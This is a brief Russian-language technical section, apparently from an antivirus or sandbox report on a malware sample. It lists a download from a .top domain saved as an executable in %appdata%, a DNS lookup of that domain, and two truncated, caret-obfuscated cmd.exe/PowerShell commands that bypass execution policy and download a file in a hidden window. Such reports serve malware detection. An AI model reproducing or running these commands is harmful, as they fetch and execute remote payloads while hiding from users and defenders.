Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^owE^R^sH^Ell.^e^Xe ^-e^X^eC^UT^IonPO^L^I^C^Y ^by^pA^s^s -^n^oP^rOfi^lE -WiNDO^WST^Y^lE ^HI^dde^n ^(^NEW-^oB^j^e^Ct S^YStEm.N^Et.WeBCl^I^e^N^T).^DOWN^l^OAD^f^Ile('http://monda...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "P^owE^R^sH^Ell.^e^Xe ^-e^X^eC^UT^IonPO^L^I^C^Y ^by^pA^s^s -^n^oP^rOfi^lE -WiNDO^WST^Y^lE ^HI^dde^n ^(^NEW-^oB^j^e^Ct S^YStEm.N^Et.WeBCl^I^e^N^T).^DOWN^l^OAD^f^Ile('http://monda...' (со скрытым окном)